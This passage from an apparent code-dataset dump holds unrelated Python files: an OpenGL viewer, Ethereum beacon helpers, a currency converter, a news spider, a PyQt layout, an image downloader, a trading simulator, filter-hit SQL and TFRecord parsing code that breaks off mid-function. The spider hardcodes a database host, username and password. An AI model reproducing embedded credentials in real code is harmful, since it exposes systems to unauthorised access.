globally\n self.color_shader = Shader(COLOR_VERT, COLOR_FRAG)\n\n # initially empty list of object to draw\n self.drawables = []\n self.trackball = GLFWTrackball(self.win)\n\n # cyclic iterator to easily toggle polygon rendering modes\n self.fill_modes = cycle([GL.GL_LINE, GL.GL_POINT, GL.GL_FILL])\n\n def run(self):\n \"\"\" Main render loop for this OpenGL window \"\"\"\n while not glfw.window_should_close(self.win):\n # clear draw buffer and depth buffer (<-TP2)\n GL.glClear(GL.GL_COLOR_BUFFER_BIT | GL.GL_DEPTH_BUFFER_BIT)\n\n winsize = glfw.get_window_size(self.win)\n view = self.trackball.view_matrix()\n projection = self.trackball.projection_matrix(winsize)\n\n # draw our scene objects\n for drawable in self.drawables:\n drawable.draw(projection, view, identity(), win=self.win,\n color_shader=self.color_shader)\n\n # flush render commands, and swap draw buffers\n glfw.swap_buffers(self.win)\n\n # Poll for and process events\n glfw.poll_events()\n\n def add(self, *drawables):\n \"\"\" add objects to draw in this window \"\"\"\n self.drawables.extend(drawables)\n\n def on_key(self, _win, key, _scancode, action, _mods):\n \"\"\" 'Q' or 'Escape' quits \"\"\"\n if action == glfw.PRESS or action == glfw.REPEAT:\n if key == glfw.KEY_ESCAPE or key == glfw.KEY_Q:\n glfw.set_window_should_close(self.win, True)\n if key == glfw.KEY_W:\n GL.glPolygonMode(GL.GL_FRONT_AND_BACK, next(self.fill_modes))\n if key == glfw.KEY_SPACE:\n glfw.set_time(0)\n\n\n# -------------- main program and scene setup --------------------------------\ndef main():\n \"\"\" create a window, add scene objects, then run rendering loop \"\"\"\n viewer = Viewer()\n\n if len(sys.argv) < 2:\n print('Cylinder skinning demo.')\n print('Note:\\n\\t%s [3dfile]*\\n\\n3dfile\\t\\t the filename of a model in'\n ' format supported by pyassimp.' % sys.argv[0])\n viewer.add(SkinnedCylinder())\n else:\n viewer.add(*[m for file in sys.argv[1:] for m in load_skinned(file)])\n\n # start rendering loop\n viewer.run()\n\n\nif __name__ == '__main__':\n glfw.init() # initialize window system glfw\n main() # main function keeps variables locally scoped\n glfw.terminate() # destroy all glfw windows and GL contexts\n","sub_path":"development_stage/viewer7.py","file_name":"viewer7.py","file_ext":"py","file_size_in_byte":25680,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"266370991","text":"from typing import (\n Sequence,\n Tuple,\n TYPE_CHECKING,\n)\n\n\nfrom eth_utils import (\n ValidationError,\n)\nfrom eth_typing import (\n Hash32,\n)\n\nfrom eth2.beacon._utils.hash import (\n hash_eth2,\n)\nfrom eth2.beacon.enums import (\n SignatureDomain,\n)\nfrom eth2.beacon.typing import (\n Epoch,\n Gwei,\n Slot,\n ValidatorIndex,\n)\nfrom eth2.beacon.validation import (\n validate_epoch_for_active_index_root,\n validate_epoch_for_active_randao_mix,\n)\n\nif TYPE_CHECKING:\n from eth2.beacon.types.attestation_data import AttestationData # noqa: F401\n from eth2.beacon.types.states import BeaconState # noqa: F401\n from eth2.beacon.types.forks import Fork # noqa: F401\n from eth2.beacon.types.slashable_attestations import SlashableAttestation # noqa: F401\n from eth2.beacon.types.validator_records import ValidatorRecord # noqa: F401\n\n\n#\n# Time unit convertion\n#\ndef slot_to_epoch(slot: Slot, slots_per_epoch: int) -> Epoch:\n return Epoch(slot // slots_per_epoch)\n\n\ndef get_epoch_start_slot(epoch: Epoch, slots_per_epoch: int) -> Slot:\n return Slot(epoch * slots_per_epoch)\n\n\ndef _get_block_root(\n latest_block_roots: Sequence[Hash32],\n state_slot: Slot,\n slot: Slot,\n latest_block_roots_length: int) -> Hash32:\n \"\"\"\n Return the block root at a recent ``slot``.\n \"\"\"\n if state_slot > slot + latest_block_roots_length:\n raise ValidationError(\n \"state.slot ({}) should be less than or equal to \"\n \"(slot + latest_block_roots_length) ({}), \"\n \"where slot={}, latest_block_roots_length={}\".format(\n state_slot,\n slot + latest_block_roots_length,\n slot,\n latest_block_roots_length,\n )\n )\n if slot >= state_slot:\n raise ValidationError(\n \"slot ({}) should be less than state.slot ({})\".format(\n slot,\n state_slot,\n )\n )\n return latest_block_roots[slot % latest_block_roots_length]\n\n\ndef get_block_root(\n state: 'BeaconState',\n slot: Slot,\n latest_block_roots_length: int) -> Hash32:\n \"\"\"\n Return the block root at a recent ``slot``.\n \"\"\"\n return _get_block_root(\n state.latest_block_roots,\n state.slot,\n slot,\n latest_block_roots_length,\n )\n\n\ndef get_randao_mix(state: 'BeaconState',\n epoch: Epoch,\n slots_per_epoch: int,\n latest_randao_mixes_length: int) -> Hash32:\n \"\"\"\n Return the randao mix at a recent ``epoch``.\n \"\"\"\n validate_epoch_for_active_randao_mix(\n state.current_epoch(slots_per_epoch),\n epoch,\n latest_randao_mixes_length,\n )\n\n return state.latest_randao_mixes[epoch % latest_randao_mixes_length]\n\n\ndef get_active_validator_indices(validators: Sequence['ValidatorRecord'],\n epoch: Epoch) -> Tuple[ValidatorIndex, ...]:\n \"\"\"\n Get indices of active validators from ``validators``.\n \"\"\"\n return tuple(\n ValidatorIndex(index)\n for index, validator in enumerate(validators)\n if validator.is_active(epoch)\n )\n\n\ndef generate_seed(state: 'BeaconState',\n epoch: Epoch,\n slots_per_epoch: int,\n min_seed_lookahead: int,\n activation_exit_delay: int,\n latest_active_index_roots_length: int,\n latest_randao_mixes_length: int) -> Hash32:\n \"\"\"\n Generate a seed for the given ``epoch``.\n \"\"\"\n randao_mix = get_randao_mix(\n state=state,\n epoch=Epoch(epoch - min_seed_lookahead),\n slots_per_epoch=slots_per_epoch,\n latest_randao_mixes_length=latest_randao_mixes_length,\n )\n active_index_root = get_active_index_root(\n state=state,\n epoch=epoch,\n slots_per_epoch=slots_per_epoch,\n activation_exit_delay=activation_exit_delay,\n latest_active_index_roots_length=latest_active_index_roots_length,\n )\n epoch_as_bytes = epoch.to_bytes(32, byteorder=\"little\")\n\n return hash_eth2(randao_mix + active_index_root + epoch_as_bytes)\n\n\ndef get_active_index_root(state: 'BeaconState',\n epoch: Epoch,\n slots_per_epoch: int,\n activation_exit_delay: int,\n latest_active_index_roots_length: int) -> Hash32:\n \"\"\"\n Return the index root at a recent ``epoch``.\n \"\"\"\n validate_epoch_for_active_index_root(\n state.current_epoch(slots_per_epoch),\n epoch,\n activation_exit_delay,\n latest_active_index_roots_length,\n )\n\n return state.latest_active_index_roots[epoch % latest_active_index_roots_length]\n\n\ndef get_effective_balance(\n validator_balances: Sequence[Gwei],\n index: ValidatorIndex,\n max_deposit_amount: Gwei) -> Gwei:\n \"\"\"\n Return the effective balance (also known as \"balance at stake\") for a\n ``validator`` with the given ``index``.\n \"\"\"\n return min(validator_balances[index], max_deposit_amount)\n\n\ndef get_total_balance(validator_balances: Sequence[Gwei],\n validator_indices: Sequence[ValidatorIndex],\n max_deposit_amount: Gwei) -> Gwei:\n \"\"\"\n Return the combined effective balance of an array of validators.\n \"\"\"\n return Gwei(sum(\n get_effective_balance(validator_balances, index, max_deposit_amount)\n for index in validator_indices\n ))\n\n\ndef get_fork_version(fork: 'Fork',\n epoch: Epoch) -> bytes:\n \"\"\"\n Return the current ``fork_version`` from the given ``fork`` and ``epoch``.\n \"\"\"\n if epoch < fork.epoch:\n return fork.previous_version\n else:\n return fork.current_version\n\n\ndef get_domain(fork: 'Fork',\n epoch: Epoch,\n domain_type: SignatureDomain) -> int:\n \"\"\"\n Return the domain number of the current fork and ``domain_type``.\n \"\"\"\n return int.from_bytes(\n get_fork_version(\n fork,\n epoch,\n ) + domain_type.to_bytes(4, 'little'),\n 'little'\n )\n\n\ndef is_double_vote(attestation_data_1: 'AttestationData',\n attestation_data_2: 'AttestationData',\n slots_per_epoch: int) -> bool:\n \"\"\"\n Assumes ``attestation_data_1`` is distinct from ``attestation_data_2``.\n\n Return True if the provided ``AttestationData`` are slashable\n due to a 'double vote'.\n \"\"\"\n return (\n slot_to_epoch(attestation_data_1.slot, slots_per_epoch) ==\n slot_to_epoch(attestation_data_2.slot, slots_per_epoch)\n )\n\n\ndef is_surround_vote(attestation_data_1: 'AttestationData',\n attestation_data_2: 'AttestationData',\n slots_per_epoch: int) -> bool:\n \"\"\"\n Assumes ``attestation_data_1`` is distinct from ``attestation_data_2``.\n\n Return True if the provided ``AttestationData`` are slashable\n due to a 'surround vote'.\n\n Note: parameter order matters as this function only checks\n that ``attestation_data_1`` surrounds ``attestation_data_2``.\n \"\"\"\n source_epoch_1 = attestation_data_1.justified_epoch\n source_epoch_2 = attestation_data_2.justified_epoch\n target_epoch_1 = slot_to_epoch(attestation_data_1.slot, slots_per_epoch)\n target_epoch_2 = slot_to_epoch(attestation_data_2.slot, slots_per_epoch)\n return source_epoch_1 < source_epoch_2 and target_epoch_2 < target_epoch_1\n\n\ndef get_delayed_activation_exit_epoch(\n epoch: Epoch,\n activation_exit_delay: int) -> Epoch:\n \"\"\"\n An entry or exit triggered in the ``epoch`` given by the input takes effect at\n the epoch given by the output.\n \"\"\"\n return Epoch(epoch + 1 + activation_exit_delay)\n","sub_path":"eth2/beacon/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":7846,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"428851964","text":"from Tkinter import *\nimport urllib2\nfrom xml.etree import ElementTree\n\ndef convertd():\n\tmult = dll.get()\n\tmult = float(mult)\n\tcon_dollar = dollar * mult\n\trcon_dollar = round(con_dollar,2)\n\tlabel_5.config(text=rcon_dollar)\n\treturn\n\ndef convertp():\n\tdiv = pes.get()\n\tdiv = float(div)\n\tcon_peso = div / dollar\n\trcon_peso = round(con_peso,2)\n\tlabel_6.config(text=rcon_peso)\n\treturn\n\nroot = Tk()\nroot.title('USD TO PESO')\ndll = StringVar()\npes = StringVar()\n\nlabel_1 = Label(root, text = \"Dollar\")\nlabel_3 = Label(root, text = \"To Peso\")\nlabel_2 = Label(root, text = \"Peso\")\nlabel_4 = Label(root, text = \"To Dollar\")\nlabel_5 = Label(root, text=0)\nlabel_6 = Label(root, text=0)\n\nentry_1 = Entry(root, textvariable = dll)\nentry_2 = Entry(root, textvariable = pes)\n\nbutton1 = Button(root, text=\"Go!\",width=15,command = convertd)\nbutton2 = Button(root, text=\"Go!\",width=15, command = convertp)\n\nlabel_1.grid(row=0)\nlabel_3.grid(row=1)\nlabel_2.grid(row=3)\nlabel_4.grid(row=4)\nlabel_5.grid(row=1, column=1)\nlabel_6.grid(row=4, column=1)\n\nentry_1.grid(row=0, column=1)\nentry_2.grid(row=3, column=1)\n\nbutton1.grid(row=2, column=1)\nbutton2.grid(row=5, column=1)\n\nresult = urllib2.urlopen('https://query.yahooapis.com/v1/public/yql?q=select%20*%20from%20yahoo.finance.xchange%20where%20pair%20in%20(%22USDMXN%22)&diagnostics=true&env=store%3A%2F%2Fdatatables.org%2Falltableswithkeys').read()\nxml = ElementTree.fromstring(result)\ndollar = xml.findtext('.//Rate')\ndollar = float(dollar)\n\nroot.mainloop()\n","sub_path":"USDMXN.py","file_name":"USDMXN.py","file_ext":"py","file_size_in_byte":1488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"54489310","text":"from crawler.spiders import BaseSpider\n\n# 此文件包含的头文件不要修改\nimport scrapy\nfrom utils.util_old import *\nfrom crawler.items import *\nfrom bs4 import BeautifulSoup\nfrom scrapy.http import Request, Response\nimport re\nimport time\n\n\n#将爬虫类名和name字段改成对应的网站名\nclass technobaboy(BaseSpider):\n name = 'technobaboy'\n website_id = 1246 # 网站的id(必填)\n language_id = 1866 # 所用语言的id\n start_urls = ['https://www.technobaboy.com/']\n sql = { # sql配置\n 'host': '192.168.235.162',\n 'user': 'dg_admin',\n 'password': 'dg_admin',\n 'db': 'dg_crawler'\n }\n\n # 这是类初始化函数,用来传时间戳参数\n \n \n \n\n def parse(self,response):\n meta={}\n meta['category2']=''\n soup=BeautifulSoup(response.text,'lxml')\n cat1_list=soup.find('ul',class_='menu').select('li>a')\n for cat1 in cat1_list:\n url=cat1['href']\n meta['category1']=cat1.text\n yield scrapy.Request(url,meta=meta,callback=self.parse_category2)\n\n def parse_category2(self,response):\n soup=BeautifulSoup(response.text,'lxml')\n url_list=soup.select('.col-12 .content h2 a') if soup.select('.col-12 .content h2 a') else None\n if(url_list):\n for url in url_list:\n news_url=url.get('href')\n yield scrapy.Request(news_url,meta=response.meta,callback=self.parse_details)\n if soup.find('span',class_='page-numbers label-next'):\n next_url=soup.find('span',class_='page-numbers label-next').find('a').get('href')\n if self.time==None or Util.format_time3(Util.format_time2(soup.select('.posts-wrap time')[-1].text)) >= int(self.time):\n yield scrapy.Request(next_url,meta=response.meta,callback=self.parse_category2)\n else:\n self.logger.info('时间截止')\n\n def parse_details(self,response):\n item=NewsItem()\n soup=BeautifulSoup(response.text,'lxml')\n item['category1']=response.meta['category1']\n item['category2']=response.meta['category2']\n \n item['title']=soup.find('h1',class_='post-title').text.strip() if soup.find('h1',class_='post-title') else None\n \n item['body'] = ''#不能忘记初始化\n body_list=soup.find('div',class_='post-content description cf entry-content content-spacious').select('p') if soup.find('div',class_='post-content description cf entry-content content-spacious').select('p') else None\n if(body_list):\n for body in body_list:\n item['body'] += body.text.strip()\n item['body'] +='\\n'\n \n\n item['abstract']=soup.find('div',class_='post-content description cf entry-content content-spacious').select('p')[0].text.strip() if soup.find('div',class_='post-content description cf entry-content content-spacious').select('p') else None\n \n\n item['images']=[]\n \n\n image_list_0=soup.select('.featured>a')if soup.select('.featured>a') else None\n if(image_list_0):\n for image_0 in image_list_0:\n image_0=image_0.get('href')\n item['images'].append(image_0)\n \n\n\n image_list=soup.find('div',class_='post-content description cf entry-content content-spacious').select('img')if soup.find('div',class_='post-content description cf entry-content content-spacious').select('img') else None\n if(image_list):\n for image in image_list:\n image=image.get('src')\n item['images'].append(image)\n \n \n pub=soup.find('time',class_='post-date').text.strip() if soup.find('time',class_='post-date') else None\n if(pub):\n pub=Util.format_time2(pub)\n item['pub_time']=pub\n print(item['pub_time'])\n\n yield item","sub_path":"crawler/v1/technobaboy.py","file_name":"technobaboy.py","file_ext":"py","file_size_in_byte":3930,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"465706407","text":"\nA_team = 11\nB_team = 11\ncards = input().split(' ')\nremoved_cards = []\nfor card in cards:\n if card in removed_cards:\n continue\n removed_cards.append(card)\n team, card = card.split('-')\n card = int(card)\n if team == 'A' and 1 <= card <= 11:\n A_team -= 1\n elif team == 'B' and 1 <= card <= 11:\n B_team -= 1\n if A_team < 7 or B_team < 7:\n print(f'Team A - {A_team}; Team B - {B_team}')\n print('Game was terminated')\n break\nif A_team >= 7 and B_team >= 7:\n print(f'Team A - {A_team}; Team B - {B_team}')\n\n","sub_path":"Lists2/03. Football Cards.py","file_name":"03. Football Cards.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"628137438","text":"def to_weird_case(string):\n words = string.split(' ')\n new_words = []\n for i in range(len(words)):\n new_word = ''\n for j in range(len(words[i])):\n if j % 2 != 0:\n new_word += words[i][j].lower()\n else:\n new_word += words[i][j].upper()\n\n new_words.append(new_word)\n\n return ' '.join(new_words)\n\nprint(to_weird_case('stst test sssa tsst Test valami vala test'))\n","sub_path":"practice/codewars/weird_string_case.py","file_name":"weird_string_case.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"122240387","text":"from PyQt6.QtCore import *\nfrom PyQt6.QtGui import *\nfrom PyQt6.QtWidgets import *\n\nfrom ..core.widget import set_contents_margins\n\n\nclass QXVBoxLayout(QVBoxLayout):\n def __init__(self, widgets=None, contents_margins=0, spacing=0):\n super().__init__()\n set_contents_margins(self, contents_margins)\n if widgets is not None:\n for widget in widgets:\n alignment = None\n if isinstance(widget, int):\n thickness=widget\n widget = QWidget()\n widget.setFixedHeight(thickness)\n widget.setSizePolicy(QSizePolicy.Policy.Expanding, QSizePolicy.Policy.Fixed)\n\n if isinstance(widget, (tuple,list)):\n widget, alignment = widget\n\n if isinstance(widget, QLayout):\n self.addLayout(widget)\n else:\n self.addWidget(widget)\n if alignment is not None:\n self.setAlignment(widget, alignment)\n if spacing is not None:\n self.setSpacing(spacing)\n","sub_path":"xlib/qt/widgets/QXVBoxLayout.py","file_name":"QXVBoxLayout.py","file_ext":"py","file_size_in_byte":1111,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"392460169","text":"\"\"\" Creates a dataset by reading image links obtained from google images through 'Image Link Grabber' plugin and\n downloads each image for those links. Images are stored in data directory under their respective class folder.\n\"\"\"\nfrom fastai.vision.utils import download_images\nfrom fastai.vision import *\nfrom fastai.imports import *\nimport os\nimport zipfile\nimport time\n\n\n# downloads images to specific directories in data folder for each class\ndef download_images_to_folder(file, folder):\n path = Path('../data/dataset_csvs/')\n dest = path / folder\n dest.mkdir(parents=True, exist_ok=True)\n download_images(path / file, dest)\n\n\n# used if running on google colab, to zip the folder for downloading dataset\ndef zip_folder(data_class_name):\n zip_file = zipfile.ZipFile(data_class_name + '.zip', 'w', zipfile.ZIP_DEFLATED)\n filepath = 'data/dataset_csvs/' + data_class_name + '/'\n for root, dirs, files in os.walk(filepath):\n for file in files:\n zip_file.write(os.path.join(root, file),\n os.path.relpath(os.path.join(root, file), os.path.join(filepath, '../..')))\n zip_file.close()\n\n\n# opens all csv files in data folder and downloads the images to their respective class folders\ndef main():\n for all_files in os.listdir('../data/dataset_csvs/'):\n if all_files.endswith('.csv'):\n filename = all_files\n class_name = filename.split('.')[0]\n print('Downloading files for {0} class'.format(class_name))\n print(filename)\n download_images_to_folder(filename, class_name)\n print('... Downloaded files for {0} class'.format(class_name))\n time.sleep(5)\n # uncomment the line below if folder needs to be zipped\n # zip_folder(class_name)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"utils/download_google_images.py","file_name":"download_google_images.py","file_ext":"py","file_size_in_byte":1842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"601198310","text":"import os\nimport json\nfrom google_images_download import google_images_download\n\nrequests = {\n 'computer-keyboard': ('keyboard', 'gaming keyboard', 'computer keyboard'),\n 'computer-mouse': ('computer mouse', 'gaming mouse', 'mouse laptop'),\n 'computer-monitor': ('monitor', 'computer monitor', 'computer monitor reviews'),\n}\n\nfor dir, keywords in requests.items():\n # Download images\n for kw in keywords:\n response = google_images_download.googleimagesdownload()\n args = {\n 'keywords': kw,\n 'format': 'jpg',\n 'output_directory': '.',\n 'image_directory': dir,\n #'limit': 1, # for debugging\n }\n response.download(args)\n\n # Rename files\n path = os.path.join('.', dir)\n for i, file in enumerate(os.listdir(path)):\n os.rename(os.path.join(path, file),\n os.path.join(path, str(i) + '.jpg'))\n\n# Save labels to json format\nwith open(os.path.join('..', 'label.json'), 'w') as f:\n d = {'labels': list(requests.keys())}\n f.write(json.dumps(d, indent=2, separators=(',', ': ')))\n","sub_path":"training/dataset/download_images.py","file_name":"download_images.py","file_ext":"py","file_size_in_byte":1105,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"139363313","text":"# External imports\r\nimport pandas as pd\r\n\r\n#===============================================================================\r\n# Class for simulating strategies \r\n#===============================================================================\r\n\r\nclass Simulator:\r\n\t'''\r\n\tClass for simulating simplest trading strategies and their outcome\r\n\t'''\r\n\tdef __init__(self, finance_data, depot, strategy, start_time=None):\r\n\t\t'''\r\n\t\tConstructor of the simulator class\r\n\t\t\r\n\t\tArgs:\r\n\t\t\tfinance_data (pd.DataFrame): data frame containing all the finance\r\n\t\t\t\tdata on which the simulation is run\r\n\t\t\tdepot (Depot object): contains the starting parameters for the\r\n\t\t\t\tsimulation.\r\n\t\t\tstrategy (function): the strategy used for buying and selling\r\n\t\t'''\r\n\t\t# Copy references to parameters to class variables\r\n\t\tself.finance = finance_data\r\n\t\tself.depot = depot\r\n\t\tself.strategy = strategy\r\n\t\tself.start_time = start_time\r\n\t\t# Create sorted list of unique dates from given finance data\r\n\t\tself.dates = list(set(self.finance.data.reset_index()['Date']))\r\n\t\tself.dates.sort()\r\n\t\t# Reduce dates to those after start_time\r\n\t\tif self.start_time:\r\n\t\t\t#List comprehension to apply start date\r\n\t\t\tself.dates = [x for x in self.dates if x >= self.start_time]\r\n\t\telse:\r\n\t\t\tself.start_time = min(self.dates)\r\n\t\t# Create the simulation result object\r\n\t\tself.result = pd.DataFrame(index=self.dates)\r\n\t\tself.result['capital'] = pd.np.nan \r\n\t\r\n\t\t\r\n\tdef run(self, **kwargs):\r\n\t\t'''\r\n\t\tFunction to run the simulation of a strategy\r\n\t\t'''\r\n\t\t# Initialize back-testing variables\r\n\t\tfor time in self.dates:\r\n\t\t\t# only pass data that should be known\r\n\t\t\ttime_data = self.finance.data.select(lambda x: x[1] <= time)\r\n\t\t\tself.strategy(data=time_data, depot=self.depot, time=time, **kwargs)\r\n\t\t\t# Save the time development of the capital\r\n\t\t\tself.result.loc[time]['capital'] = self.depot.capital\r\n\t\t# At end of simulation monetize all your assets at closing price\r\n\t\ttime = max(self.dates)\r\n\t\tself.depot.monetize(self.finance.data.xs(time,level=1)['Close'])\r\n\t\t# Sace the capital in results object\r\n\t\tself.result.loc[time]['capital'] = self.depot.capital\r\n\t\t# For convenience return the result object\r\n\t\treturn self.result\r\n","sub_path":"src/simulator.py","file_name":"simulator.py","file_ext":"py","file_size_in_byte":2185,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"191535282","text":"# coding: utf-8\n\n# This file is part of the Adblock Plus web scripts,\n# Copyright (C) 2006-2016 Eyeo GmbH\n#\n# Adblock Plus is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 3 as\n# published by the Free Software Foundation.\n#\n# Adblock Plus is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with Adblock Plus. If not, see .\n\nimport itertools\n\nfrom sitescripts.filterhits import db\n\ndef update(interval, data):\n \"\"\"\n Generator that provides all the SQL and parameters needed to update the\n aggregations for the given data + interval in the database.\n \"\"\"\n for filter, filter_data in data[\"filters\"].iteritems():\n yield (\"\"\"INSERT IGNORE INTO `filters`\n (filter, sha1) VALUES (%s, UNHEX(SHA1(filter)))\"\"\", filter)\n\n domains = itertools.chain(filter_data.get(\"thirdParty\", {}).iteritems(),\n filter_data.get(\"firstParty\", {}).iteritems())\n for domain, domain_data in domains:\n yield (\"\"\"INSERT INTO `frequencies`\n (filter_sha1, domain, frequency, timestamp)\n VALUES (UNHEX(SHA1(%s)), %s, %s, FROM_UNIXTIME(%s))\n ON DUPLICATE KEY UPDATE\n frequency = (\n POW(frequency, 1 - (UNIX_TIMESTAMP(VALUES(timestamp)) -\n UNIX_TIMESTAMP(timestamp)) / %s) *\n POW(VALUES(frequency), (UNIX_TIMESTAMP(VALUES(timestamp)) -\n UNIX_TIMESTAMP(timestamp)) / %s)),\n timestamp = VALUES(timestamp)\"\"\",\n filter, domain, domain_data[\"hits\"],\n int(domain_data[\"latest\"] / 1000), interval, interval)\n","sub_path":"sitescripts/filterhits/geometrical_mean.py","file_name":"geometrical_mean.py","file_ext":"py","file_size_in_byte":1992,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"173839252","text":"import tensorflow as tf\nfrom tensorflow import io\nfrom tensorflow import data\nfrom tensorflow import sparse\nfrom tensorflow import image\nfrom logging import Logger\n\nfrom ml4ir.base.io.file_io import FileIO\nfrom ml4ir.base.features.preprocessing import PreprocessingMap\nfrom ml4ir.base.features.feature_config import FeatureConfig\nfrom ml4ir.base.config.keys import SequenceExampleTypeKey, TFRecordTypeKey\n\n\"\"\"\nThis module contains helper methods for reading and writing\ndata in the train.SequenceExample protobuf format\n\"\"\"\n\n\ndef preprocess_feature(feature_tensor, feature_info, preprocessing_map):\n # Preprocess features\n preprocessing_info = feature_info.get(\"preprocessing_info\", [])\n\n if preprocessing_info:\n for preprocessing_step in preprocessing_info:\n preprocessing_fn = preprocessing_map.get_fn(preprocessing_step[\"fn\"])\n if preprocessing_fn:\n feature_tensor = preprocessing_fn(\n feature_tensor, **preprocessing_step.get(\"args\", {})\n )\n return feature_tensor\n\n\ndef make_example_parse_fn(\n feature_config: FeatureConfig,\n preprocessing_map: PreprocessingMap,\n required_fields_only: bool = False,\n) -> tf.function:\n \"\"\"\n Create a parse function using the Example features spec\n\n Args:\n feature_config: FeatureConfig object defining context and sequence features\n max_sequence_size: Maximum number of sequence per query. Used for padding.\n required_fields_only: Whether to only use required fields from the feature_config\n pad_sequence: Whether to pad sequence\n \"\"\"\n\n features_spec = dict()\n\n for feature_info in feature_config.get_all_features():\n serving_info = feature_info[\"serving_info\"]\n if not required_fields_only or serving_info.get(\"required\", feature_info[\"trainable\"]):\n feature_name = feature_info[\"name\"]\n dtype = feature_info[\"dtype\"]\n default_value = feature_config.get_default_value(feature_info)\n features_spec[feature_name] = io.FixedLenFeature(\n [], dtype, default_value=default_value\n )\n print(features_spec)\n\n @tf.function\n def _parse_example_fn(example_proto):\n \"\"\"\n Parse the input `tf.Example` proto using the features_spec\n\n Args:\n example_proto: tfrecord Example protobuf data\n\n Returns:\n features: parsed features extracted from the protobuf\n labels: parsed label extracted from the protobuf\n \"\"\"\n features = io.parse_single_example(serialized=example_proto, features=features_spec)\n\n features_dict = dict()\n\n # Process all features, including label.\n for feature_info in feature_config.get_all_features():\n feature_node_name = feature_info.get(\"node_name\", feature_info[\"name\"])\n\n default_tensor = tf.constant(\n value=feature_config.get_default_value(feature_info), dtype=feature_info[\"dtype\"],\n )\n feature_tensor = features.get(feature_info[\"name\"], default_tensor)\n\n feature_tensor = tf.expand_dims(feature_tensor, axis=0)\n\n feature_tensor = preprocess_feature(feature_tensor, feature_info, preprocessing_map)\n\n features_dict[feature_node_name] = feature_tensor\n\n labels = features_dict.pop(feature_config.get_label(key=\"name\"))\n\n return features_dict, labels\n\n return _parse_example_fn\n\n\ndef make_sequence_example_parse_fn(\n feature_config: FeatureConfig,\n preprocessing_map: PreprocessingMap,\n max_sequence_size: int = 25,\n required_fields_only: bool = False,\n pad_sequence: bool = True,\n) -> tf.function:\n \"\"\"\n Create a parse function using the context and sequence features spec\n\n Args:\n feature_config: FeatureConfig object defining context and sequence features\n max_sequence_size: Maximum number of sequence per query. Used for padding.\n required_fields_only: Whether to only use required fields from the feature_config\n pad_sequence: Whether to pad sequence\n \"\"\"\n\n context_features_spec = dict()\n sequence_features_spec = dict()\n\n for feature_info in feature_config.get_all_features():\n serving_info = feature_info[\"serving_info\"]\n if not required_fields_only or serving_info.get(\"required\", feature_info[\"trainable\"]):\n feature_name = feature_info[\"name\"]\n dtype = feature_info[\"dtype\"]\n default_value = feature_config.get_default_value(feature_info)\n if feature_info[\"tfrecord_type\"] == SequenceExampleTypeKey.CONTEXT:\n context_features_spec[feature_name] = io.FixedLenFeature(\n [], dtype, default_value=default_value\n )\n elif feature_info[\"tfrecord_type\"] == SequenceExampleTypeKey.SEQUENCE:\n sequence_features_spec[feature_name] = io.VarLenFeature(dtype=dtype)\n\n @tf.function\n def _parse_sequence_example_fn(sequence_example_proto):\n \"\"\"\n Parse the input `tf.SequenceExample` proto using the features_spec\n\n Args:\n sequence_example_proto: tfrecord SequenceExample protobuf data\n\n Returns:\n features: parsed features extracted from the protobuf\n labels: parsed label extracted from the protobuf\n \"\"\"\n context_features, sequence_features = io.parse_single_sequence_example(\n serialized=sequence_example_proto,\n context_features=context_features_spec,\n sequence_features=sequence_features_spec,\n )\n\n features_dict = dict()\n\n # Handle context features\n for feature_info in feature_config.get_context_features():\n feature_node_name = feature_info.get(\"node_name\", feature_info[\"name\"])\n\n default_tensor = tf.constant(\n value=feature_config.get_default_value(feature_info), dtype=feature_info[\"dtype\"],\n )\n feature_tensor = context_features.get(feature_info[\"name\"], default_tensor)\n\n feature_tensor = tf.expand_dims(feature_tensor, axis=0)\n\n # Preprocess features\n feature_tensor = preprocess_feature(feature_tensor, feature_info, preprocessing_map)\n\n features_dict[feature_node_name] = feature_tensor\n\n # Define mask to identify padded sequence\n if required_fields_only and not feature_config.get_rank(\"serving_info\")[\"required\"]:\n \"\"\"\n Define dummy mask if the rank field is not a required field for serving\n\n NOTE:\n This masks all max_sequence_size as 1 as there is no real way to know\n the number of sequence in the query. There is no predefined required field,\n and hence we would need to do a full pass of all features to find the record shape.\n This approach might be unstable if different features have different shapes.\n\n Hence we just mask all sequence\n \"\"\"\n features_dict[\"mask\"] = tf.constant(\n value=1, shape=[max_sequence_size], dtype=feature_config.get_rank(\"dtype\")\n )\n sequence_size = tf.constant(max_sequence_size, dtype=tf.int64)\n else:\n # Typically used at training time, to pad/clip to a fixed number of sequence per query\n\n # Use rank as a reference tensor to infer shape/sequence_size in query\n reference_tensor = sequence_features.get(feature_config.get_rank(key=\"node_name\"))\n\n # Add mask for identifying padded sequence\n mask = tf.ones_like(sparse.to_dense(sparse.reset_shape(reference_tensor)))\n sequence_size = tf.cast(tf.reduce_sum(mask), tf.int64)\n\n if pad_sequence:\n mask = tf.expand_dims(mask, axis=-1)\n\n def crop_fn():\n tf.print(\"\\n[WARN] Bad query found. Number of sequence : \", tf.shape(mask)[1])\n return image.crop_to_bounding_box(\n mask,\n offset_height=0,\n offset_width=0,\n target_height=1,\n 